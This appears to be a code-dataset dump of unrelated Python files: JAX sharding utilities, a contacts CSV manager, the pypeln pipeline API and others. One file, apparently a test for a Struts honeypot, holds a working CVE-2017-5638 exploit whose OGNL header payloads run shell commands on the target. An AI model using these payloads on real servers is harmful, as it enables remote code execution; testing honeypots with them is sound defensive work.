Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
Integer process index.
"""
return get_backend(backend).process_index()
# TODO: remove this sometime after jax 0.2.13 is released
def host_id(backend=None):
warnings.warn(
"jax.host_id has been renamed to jax.process_index. This alias "
"will eventually be removed; please update your code.")
return process_index(backend)
def process_count(backend: Optional[str] = None) -> int:
"""Returns the number of JAX processes associated with the backend."""
return max(d.process_index for d in devices(backend)) + 1
# TODO: remove this sometime after jax 0.2.13 is released
def host_count(backend=None):
warnings.warn(
"jax.host_count has been renamed to jax.process_count. This alias "
"will eventually be removed; please update your code.")
return process_count(backend)
# TODO: remove this sometime after jax 0.2.13 is released
def host_ids(backend=None):
warnings.warn(
"jax.host_ids has been deprecated; please use range(jax.process_count()) "
"instead. jax.host_ids will eventually be removed; please update your "
"code.")
return list(range(process_count(backend)))
### utility functions
def parameter(builder, num, shape, name=None, replicated=None):
if name is None:
name = ''
if replicated is None:
replicated = []
elif isinstance(replicated, bool):
replicated = [replicated] * shape.leaf_count()
return xops.Parameter(builder, num,
shape.with_major_to_minor_layout_if_absent(), name,
replicated)
# HLO instructions optionally can be annotated to say how the output should be
# spatially partitioned (represented in XLA as OpSharding protos, see
# _sharding_to_proto). For array outputs, the annotation is either an int per
# dimension specifying the number of ways that dimension divided (i.e. the total
# number of shards is the product), or None to indicate the array should be
# replicated. Tuple outputs are represented as tuples thereof. XLA supports
# arbitrary tuple nesting, but JAX only uses one level of tupling (and our type
# checkers don't support recursive types), so we only represent one level of
# nesting in this type definition.
SpatialSharding = Union[Tuple[int, ...],
None,
Tuple[Union[Tuple[int, ...], None], ...]]
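# Illustrative examples (not part of the original module): a few SpatialSharding
# values and what the comment above says they mean:
#   (2, 4)          a rank-2 array output tiled into 2 * 4 = 8 shards
#   None            the output is replicated
#   ((2, 1), None)  a tuple output: first element tiled 2-ways, second replicated
_example_shardings: Tuple[SpatialSharding, ...] = ((2, 4), None, ((2, 1), None))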
def _sharding_to_proto(sharding: SpatialSharding):
"""Converts a SpatialSharding to an OpSharding.
See
https://github.com/tensorflow/tensorflow/blob/main/tensorflow/compiler/xla/xla_data.proto#L601
for details on the OpSharding proto.
"""
proto = xla_client.OpSharding()
if isinstance(sharding, tuple) and not isinstance(sharding[0], int):
assert all(s is None or isinstance(s, tuple) for s in sharding)
return tuple_sharding_proto(list(map(_sharding_to_proto, sharding))) # type: ignore
if sharding is None:
proto.type = xla_client.OpSharding.Type.REPLICATED
else:
proto.type = xla_client.OpSharding.Type.OTHER
proto.tile_assignment_dimensions = list(sharding)
proto.tile_assignment_devices = list(range(np.product(sharding)))
return proto
def tuple_sharding_proto(elems):
proto = xla_client.OpSharding()
assert all(isinstance(e, type(proto)) for e in elems)
proto.type = xla_client.OpSharding.Type.TUPLE
proto.tuple_shardings = elems
return proto
def set_sharding_proto(builder, op, sharding_proto):
"""Uses CustomCall to annotate a value as sharded."""
# "Sharding" is a built-in custom call target that acts like an identity
# function, and is used to attach an OpSharding to.
return with_sharding_proto(builder, sharding_proto, xops.CustomCall,
builder, b"Sharding", [op], builder.get_shape(op))
def with_sharding_proto(builder, sharding_proto, op_fn, *args, **kwargs):
"""Builds op_fn(*args, **kwargs) with sharding annotation."""
builder.set_sharding(sharding_proto)
try:
return op_fn(*args, **kwargs)
finally:
builder.clear_sharding()
def set_sharding(builder, op, sharding: SpatialSharding):
"""Uses CustomCall to annotate a value as sharded."""
return set_sharding_proto(builder, op, _sharding_to_proto(sharding))
def with_sharding(builder, sharding: SpatialSharding, op_fn, *args, **kwargs):
"""Builds op_fn(*args, **kwargs) with sharding annotation."""
return with_sharding_proto(builder, _sharding_to_proto(sharding), op_fn, *args, **kwargs)
| 37.083495 | 96 | 0.716986 |
f9be8c78e39fdf74c899bd9190d5de7898efe2ff | 379 | py | Python | TestDemo/test1.py | XiMuYouZi/PythonDemo | 476d4d814338f37148bbf1504c0dd94a68f55a05 | [
"MIT"
] | null | null | null | TestDemo/test1.py | XiMuYouZi/PythonDemo | 476d4d814338f37148bbf1504c0dd94a68f55a05 | [
"MIT"
] | 1 | 2020-12-11T06:21:32.000Z | 2020-12-11T06:21:32.000Z | TestDemo/test1.py | XiMuYouZi/PythonDemo | 476d4d814338f37148bbf1504c0dd94a68f55a05 | [
"MIT"
] | null | null | null | import re
_matches = lambda url, regexs: any(r.search(url) for r in regexs)
url = 'https://book.douban.com/tag/BL?start=500&type=R>'
patten = re.compile(r'start=\d+\&type=')
allow_res = []
allow_res.append(patten)
def match(url, allow_res):
if allow_res and not _matches(url, allow_res):
return False
else:
return True
print(match(url, allow_res))
| 19.947368 | 65 | 0.672823 |
c7207703f3fd93b06322e53c83ac35058ddc8ac4 | 4,467 | py | Python | contacts.py | MrInternauta/Python-CRUD-a-CSV | ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4 | [
"MIT"
] | null | null | null | contacts.py | MrInternauta/Python-CRUD-a-CSV | ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4 | [
"MIT"
] | null | null | null | contacts.py | MrInternauta/Python-CRUD-a-CSV | ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import csv
class Contact:
def __init__(self, name, phone, email):
self.name = name
self.phone = phone
self.email = email
class ContactBook:
def __init__(self):
self._contacts = []
def add(self, name, phone, email):
contact = Contact(name, phone, email)
self._contacts.append(contact)
self._save()
print('Contacto añadido')
def show_all(self):
for contact in self._contacts:
self._print_contact(contact)
def _print_contact(self,contact):
print('--- * --- * --- * --- * --- * --- * --- * ---')
print('Nombre: {}'.format(contact.name))
print('Teléfono: {}'.format(contact.phone))
print('Email: {}'.format(contact.email))
print('--- * --- * --- * --- * --- * --- * --- * ---')
def delete(self, name):
for idx, contact in enumerate(self._contacts):
if contact.name.lower() == name.lower():
del self._contacts[idx]
self._save()
print('Contacto eliminado')
break
def search(self, name):
for contact in self._contacts:
if contact.name.upper() == name.upper():
self._print_contact(contact)
break
def not_found(self):
print('*******')
print('¡No encontrado!')
print('*******')
def _save(self):
with open('contacts.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(('name', 'phone','email'))
for contact in self._contacts:
writer.writerow((contact.name, contact.phone, contact.email))
def update(self, name, que, data):
for idx, contact in enumerate(self._contacts):
if contact.name.upper() == name.upper():
if que == 'n':
self._contacts[idx].name = data
self._print_contact(contact)
self._save()
break
elif que == 't':
self._contacts[idx].phone = data
self._print_contact(contact)
self._save()
break
elif que == 'e':
self._contacts[idx].email = data
self._print_contact(contact)
self._save()
break
else:
print('El campo que quieres actualizar no existe')
break
def run():
contact_book = ContactBook()
with open('contacts.csv', 'r') as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
if idx == 0:
continue
else:
contact_book.add(row[0], row[1], row[2])
while True:
comando = str(raw_input('''
...:::CONTACTOS:::...
-Teclea una opción-
[a]ñadir contacto
[ac]tualizar contacto
[b]uscar contacto
[e]liminar contacto
[l]istar contactos
[s]alir
'''))
print(comando)
if comando == 'a':
print('...:::Añadir contacto:::...')
name = str(raw_input('Ingresar nombre de contacto: '))
phone = str(raw_input('Ingresar telefono de contacto: '))
email = str(raw_input('Ingresar Email de contacto: '))
contact_book.add(name, phone, email)
elif comando == 'ac':
print('Actualizar contacto')
name = str(raw_input('Ingresar nombre de contacto: '))
que = str(raw_input('''
¿Que desea actualizar?
[n]ombre
[t]elefono
[e]mail
'''))
data = str(raw_input('Ingresar el nuevo dato del contacto: '))
contact_book.update( name, que, data)
elif comando == 'b':
print('Buscar contacto')
name = str(raw_input('Ingresar nombre de contacto: '))
contact_book.search(name)
elif comando == 'e':
print('Eliminar contacto')
name = str(raw_input('Ingresar nombre de contacto: '))
contact_book.delete(name)
elif comando == 'l':
print('Listar contactos')
contact_book.show_all()
elif comando == 's':
break
else:
print('Error de comando')
if __name__ == '__main__':
run()
| 29.979866 | 77 | 0.49071 |
0ebd057e450e1f0162848fa8f312826c2100fc45 | 3,959 | py | Python | test-struts2.py | Cymmetria/StrutsHoneypot | 8be5370aa070d5fc39c48b2060d2513c5617525f | [
"MIT"
] | 74 | 2017-03-20T21:55:11.000Z | 2022-03-03T15:56:37.000Z | test-struts2.py | Cymmetria/StrutsHoneypot | 8be5370aa070d5fc39c48b2060d2513c5617525f | [
"MIT"
] | 1 | 2017-09-08T11:44:05.000Z | 2017-09-10T10:27:15.000Z | test-struts2.py | Cymmetria/StrutsHoneypot | 8be5370aa070d5fc39c48b2060d2513c5617525f | [
"MIT"
] | 21 | 2017-03-21T10:50:10.000Z | 2022-01-24T13:33:48.000Z | #!/usr/bin/python
import urllib2
import requests
import httplib
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# usage: python script.py <url> "<command>"
def exploit_ct(url):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='dir')."
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
#request = urllib2.Request(url, headers=headers)
request = requests.get(url, headers=headers,verify=False)
#page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
request = e.partial
print(request.text)
return request
def exploit_cd(url):
cd_boundary = "---------------------------735323031399963166993862150"
content_type = "multipart/form-data; boundary=%s" % (cd_boundary,)
filename_payload = "%{(#nike='multipart/form-data')"
filename_payload += ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
filename_payload += ".(#_memberAccess?(#_memberAccess=#dm):("
filename_payload += "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
filename_payload += ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
filename_payload += ".(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
filename_payload += "(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
filename_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
filename_payload += "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))."
filename_payload += "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
filename_payload += ".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
cd_name = "foo"
cd_payload = "--%s\r\nContent-Disposition: form-data; name=\"%s\"; "
cd_payload += "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n"
cd_payload = cd_payload % (cd_boundary, cd_name, filename_payload, cd_boundary)
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': content_type}
#request = urllib2.Request(url, headers=headers)
request = requests.post(url, cd_payload, headers=headers,verify=False)
#page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
request = e.partial
print(request.text)
return request
def main():
import sys
if len(sys.argv) != 2:
print("Usage: %s <url>" % sys.argv[0])
return
print("");
print("\te.g: %s http://localhost/" % sys.argv[0])
print("");
print("[*] CVE: 2017-5638 - Apache Struts2 S2-045")
url = sys.argv[1]
print("[*] cmd: %s\n" % 'dir')
print("[*] Attempt #1: Content-Length exploit")
exploit_ct(url)
print("[*] Attempt #2: Content-Disposition exploit")
exploit_cd(url)
if __name__ == '__main__':
main()
| 37 | 152 | 0.687547 |
954b7a2b4ac5339d8353223b10e205ca8472d905 | 19,043 | py | Python | pypeln/process/api.py | sackh/pypeln | 4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075 | [
"MIT"
] | 1 | 2020-07-22T18:19:21.000Z | 2020-07-22T18:19:21.000Z | pypeln/process/api.py | sackh/pypeln | 4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075 | [
"MIT"
] | null | null | null | pypeln/process/api.py | sackh/pypeln | 4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075 | [
"MIT"
] | null | null | null | """
The `process` module lets you create pipelines using objects from python's [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module according to Pypeln's general [architecture](https://cgarciae.github.io/pypeln/advanced/#architecture). Use this module when you are in need of true parallelism for CPU heavy operations but be aware of its implications.
"""
import typing
from threading import Thread
from pypeln import utils as pypeln_utils
from . import utils
from .stage import Stage
#############################################################
# from_iterable
#############################################################
class FromIterable(Stage):
def __init__(self, iterable, *args, **kwargs):
super().__init__(*args, **kwargs)
self.iterable = iterable
def process(self, worker_namespace):
for x in self.iterable:
if self.pipeline_namespace.error:
return
self.output_queues.put(x)
def from_iterable(
iterable: typing.Iterable = pypeln_utils.UNDEFINED,
maxsize: int = None,
worker_constructor: typing.Type = Thread,
) -> Stage:
"""
Creates a stage from an iterable. This function gives you more control of how a stage is created through the `worker_constructor` parameter which can be either:
* `threading.Thread`: (default) is efficient for iterables that already have the data in memory like lists or numpy arrays because threads can share memory so no serialization is needed.
* `multiprocessing.Process`: is efficient for iterables whose data is not in memory, like arbitrary generators, and that benefit from escaping the GIL. This is inefficient for iterables which have data in memory because they have to be serialized when sent to the background process.
Arguments:
iterable: a source iterable.
maxsize: this parameter is not used and only kept for API compatibility with the other modules.
worker_constructor: defines the worker type for the producer stage.
Returns:
If the `iterable` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(iterable):
return pypeln_utils.Partial(
lambda iterable: from_iterable(
iterable, maxsize=None, worker_constructor=worker_constructor
)
)
return FromIterable(
iterable=iterable,
f=None,
worker_constructor=worker_constructor,
workers=1,
maxsize=0,
timeout=0,
on_start=None,
on_done=None,
dependencies=[],
)
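# Illustrative sketch (not part of the original module): exercises the
# worker_constructor choice documented above. A list that already lives in memory
# keeps the default Thread worker, while a lazily generated source may opt into a
# multiprocessing.Process worker to escape the GIL.
def _example_from_iterable_usage():
    import multiprocessing

    in_memory = from_iterable([1, 2, 3])  # Thread worker: no serialization needed
    generated = from_iterable(
        (x * x for x in range(1000)),
        worker_constructor=multiprocessing.Process,  # data is produced lazily
    )
    return in_memory, generated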
#############################################################
# to_stage
#############################################################
def to_stage(obj):
if isinstance(obj, Stage):
return obj
elif hasattr(obj, "__iter__"):
return from_iterable(obj)
else:
raise ValueError(f"Object {obj} is not a Stage or iterable")
#############################################################
# map
#############################################################
class Map(Stage):
def apply(self, x, **kwargs):
y = self.f(x, **kwargs)
self.output_queues.put(y)
def map(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
) -> Stage:
"""
Creates a stage that maps a function `f` over the data. Its intended to behave like python's built-in `map` function but with the added concurrency.
```python
import pypeln as pl
import time
from random import random
def slow_add1(x):
time.sleep(random()) # <= some slow computation
return x + 1
data = range(10) # [0, 1, 2, ..., 9]
stage = pl.process.map(slow_add1, data, workers=3, maxsize=4)
data = list(stage) # e.g. [2, 1, 5, 6, 3, 4, 7, 8, 9, 10]
```
!!! note
Because of concurrency order is not guaranteed.
Arguments:
f: A function with signature `f(x, **kwargs) -> y`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
timeout: Seconds before stopping the worker if its current task is not yet completed. Defaults to `0` which means it's unbounded.
on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument, an object with information about the worker will be passed. This function is executed once per worker at the beginning.
on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
Returns:
If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: map(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
return Map(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
#############################################################
# flat_map
#############################################################
class FlatMap(Stage):
def apply(self, x, **kwargs):
for y in self.f(x, **kwargs):
self.output_queues.put(y)
def flat_map(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
) -> Stage:
"""
Creates a stage that maps a function `f` over the data, however unlike `pypeln.process.map` in this case `f` returns an iterable. As its name implies, `flat_map` will flatten out these iterables so the resulting stage just contains their elements.
```python
import pypeln as pl
import time
from random import random
def slow_integer_pair(x):
time.sleep(random()) # <= some slow computation
if x == 0:
yield x
else:
yield x
yield -x
data = range(10) # [0, 1, 2, ..., 9]
stage = pl.process.flat_map(slow_integer_pair, data, workers=3, maxsize=4)
list(stage) # e.g. [2, -2, 3, -3, 0, 1, -1, 6, -6, 4, -4, ...]
```
!!! note
Because of concurrency order is not guaranteed.
`flat_map` is a more general operation, you can actually implement `pypeln.process.map` and `pypeln.process.filter` with it, for example:
```python
import pypeln as pl
pl.process.map(f, stage) = pl.process.flat_map(lambda x: [f(x)], stage)
pl.process.filter(f, stage) = pl.process.flat_map(lambda x: [x] if f(x) else [], stage)
```
Using `flat_map` with a generator function is very useful as e.g. you are able to filter out unwanted elements when there are exceptions, missing data, etc.
Arguments:
f: A function with signature `f(x, **kwargs) -> Iterable`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
timeout: Seconds before stopping the worker if its current task is not yet completed. Defaults to `0` which means it's unbounded.
on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument, an object with information about the worker will be passed. This function is executed once per worker at the beginning.
on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
Returns:
If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: flat_map(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
return FlatMap(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
#############################################################
# filter
#############################################################
class Filter(Stage):
def apply(self, x, **kwargs):
if self.f(x, **kwargs):
self.output_queues.put(x)
def filter(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
) -> Stage:
"""
Creates a stage that filter the data given a predicate function `f`. It is intended to behave like python's built-in `filter` function but with the added concurrency.
```python
import pypeln as pl
import time
from random import random
def slow_gt3(x):
time.sleep(random()) # <= some slow computation
return x > 3
data = range(10) # [0, 1, 2, ..., 9]
stage = pl.process.filter(slow_gt3, data, workers=3, maxsize=4)
data = list(stage) # e.g. [5, 6, 3, 4, 7, 8, 9]
```
!!! note
Because of concurrency order is not guaranteed.
Arguments:
f: A function with signature `f(x, **kwargs) -> bool`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
timeout: Seconds before stopping the worker if its current task is not yet completed. Defaults to `0` which means it's unbounded.
on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument, an object with information about the worker will be passed. This function is executed once per worker at the beginning.
on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
Returns:
If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: filter(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
return Filter(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
#############################################################
# each
#############################################################
class Each(Stage):
def apply(self, x, **kwargs):
self.f(x, **kwargs)
def each(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
run: bool = False,
) -> Stage:
"""
    Creates a stage that runs the function `f` for each element in the data, but the stage itself yields no elements. It is useful for sink stages that perform actions such as writing to disk or saving to a database and do not produce any results. For example:
```python
import pypeln as pl
def process_image(image_path):
image = load_image(image_path)
image = transform_image(image)
save_image(image_path, image)
    file_paths = get_file_paths()
stage = pl.process.each(process_image, file_paths, workers=4)
pl.process.run(stage)
```
or alternatively
```python
    file_paths = get_file_paths()
pl.process.each(process_image, file_paths, workers=4, run=True)
```
!!! note
        Because of concurrency, order is not guaranteed.
Arguments:
f: A function with signature `f(x, **kwargs) -> None`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
        timeout: Seconds before stopping the worker if its current task is not yet completed. Defaults to `0`, which means it is unbounded.
        on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument, an object with information about the worker will be passed. This function is executed once per worker at the beginning.
        on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument, an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
run: Whether or not to execute the stage immediately.
Returns:
        If the `stage` parameter is not given then this function returns a `Partial`; otherwise, if `run=False` (default) it returns a new stage, and if `run=True` it runs the stage and returns `None`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: each(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
stage = Each(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
if not run:
return stage
for _ in stage:
pass
#############################################################
# concat
#############################################################
class Concat(Stage):
def apply(self, x):
self.output_queues.put(x)
def concat(stages: typing.List[Stage], maxsize: int = 0) -> Stage:
"""
    Concatenates / merges many stages into a single one by appending elements from each stage as they come; order is not preserved.
```python
import pypeln as pl
stage_1 = [1, 2, 3]
stage_2 = [4, 5, 6, 7]
stage_3 = pl.process.concat([stage_1, stage_2]) # e.g. [1, 4, 5, 2, 6, 3, 7]
```
Arguments:
stages: a list of stages or iterables.
maxsize: the maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
Returns:
A stage object.
"""
stages = [to_stage(stage) for stage in stages]
return Concat(
f=None,
workers=1,
maxsize=maxsize,
timeout=0,
on_start=None,
on_done=None,
dependencies=stages,
)
#############################################################
# run
#############################################################
def run(stages: typing.List[Stage], maxsize: int = 0) -> None:
"""
Iterates over one or more stages until their iterators run out of elements.
```python
import pypeln as pl
data = get_data()
stage = pl.process.each(slow_fn, data, workers=6)
# execute pipeline
pl.process.run(stage)
```
Arguments:
stages: A stage/iterable or list of stages/iterables to be iterated over. If a list is passed, stages are first merged using `concat` before iterating.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
"""
if isinstance(stages, list) and len(stages) == 0:
raise ValueError("Expected at least 1 stage to run")
elif isinstance(stages, list):
stage = concat(stages, maxsize=maxsize)
else:
stage = stages
stage = to_iterable(stage, maxsize=maxsize)
    for _ in stage:
pass
#############################################################
# to_iterable
#############################################################
def to_iterable(
stage: Stage = pypeln_utils.UNDEFINED, maxsize: int = 0
) -> typing.Iterable:
"""
Creates an iterable from a stage.
Arguments:
stage: A stage object.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
Returns:
        If the `stage` parameter is given then this function returns an iterable, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(lambda stage: to_iterable(stage, maxsize=maxsize))
if isinstance(stage, Stage):
iterable = stage.to_iterable(maxsize=maxsize)
else:
iterable = stage
return iterable
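# A minimal usage sketch of the stage API defined above, assuming this module is
# importable as pypeln's `process` namespace; the helper `_keep_even`, the worker
# count and `maxsize` below are illustrative choices only.
def _keep_even(x):
    return x % 2 == 0
if __name__ == "__main__":
    _evens = filter(_keep_even, range(10), workers=2, maxsize=4)
    # to_iterable drains the stage; order is not guaranteed, so sort for display.
    print(sorted(to_iterable(_evens)))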
| 34.560799 | 375 | 0.60899 |
b8f7f02ca721b2c2f8034f2d68772722f1c0f5ac | 592 | py | Python | earthshotsoil/env_data.py | qAp/earthshotsoil | 29386e80f4e0188cd69334d7ddb526d923732f14 | [
"Apache-2.0"
] | null | null | null | earthshotsoil/env_data.py | qAp/earthshotsoil | 29386e80f4e0188cd69334d7ddb526d923732f14 | [
"Apache-2.0"
] | null | null | null | earthshotsoil/env_data.py | qAp/earthshotsoil | 29386e80f4e0188cd69334d7ddb526d923732f14 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/01_environ_covariates.ipynb (unless otherwise specified).
__all__ = ['URLs', 'n', 'n']
# Cell
import os
from urlpath import URL
import easydict
import requests
import math
import numpy as np
import xarray as xr
import rioxarray
# Cell
URLs = easydict.EasyDict()
# Cell
n = 'EarthEnvCloudCover_MODCF_interannualSD'
URLs[n] = URL('https://data.earthenv.org/cloud/'
'MODCF_interannualSD.tif')
# Cell
n = 'EarthEnvCloudCover_MODCF_intraannualSD'
URLs[n] = URL('https://data.earthenv.org/cloud/'
'MODCF_intraannualSD.tif') | 22.769231 | 105 | 0.733108 |
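# A hedged sketch of how the URLs above might be used: download one GeoTIFF with
# requests and open it with rioxarray. The helper name and the local output path
# are illustrative assumptions, not part of the notebook export.
def download_and_open(name, out_path=None):
    "Download the GeoTIFF behind URLs[name] and open it with rioxarray."
    url = URLs[name]
    out_path = out_path or f"{name}.tif"
    resp = requests.get(str(url))
    resp.raise_for_status()
    with open(out_path, "wb") as f:
        f.write(resp.content)
    return rioxarray.open_rasterio(out_path)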
b39dba5b4eab1c27a07e95bdff765b5c9c70885f | 4,381 | py | Python | airflow/providers/amazon/aws/sensors/glue_catalog_partition.py | augusto-herrmann/airflow | 7ee4295dd3f7dba4fcd763286c7823bb1707fe99 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4 | 2021-06-26T13:37:35.000Z | 2022-01-11T15:49:44.000Z | airflow/providers/amazon/aws/sensors/glue_catalog_partition.py | augusto-herrmann/airflow | 7ee4295dd3f7dba4fcd763286c7823bb1707fe99 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 33 | 2021-07-25T10:29:30.000Z | 2022-03-30T04:39:06.000Z | airflow/providers/amazon/aws/sensors/glue_catalog_partition.py | augusto-herrmann/airflow | 7ee4295dd3f7dba4fcd763286c7823bb1707fe99 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import warnings
from typing import TYPE_CHECKING, Optional, Sequence
from airflow.providers.amazon.aws.hooks.glue_catalog import GlueCatalogHook
from airflow.sensors.base import BaseSensorOperator
if TYPE_CHECKING:
from airflow.utils.context import Context
class GlueCatalogPartitionSensor(BaseSensorOperator):
"""
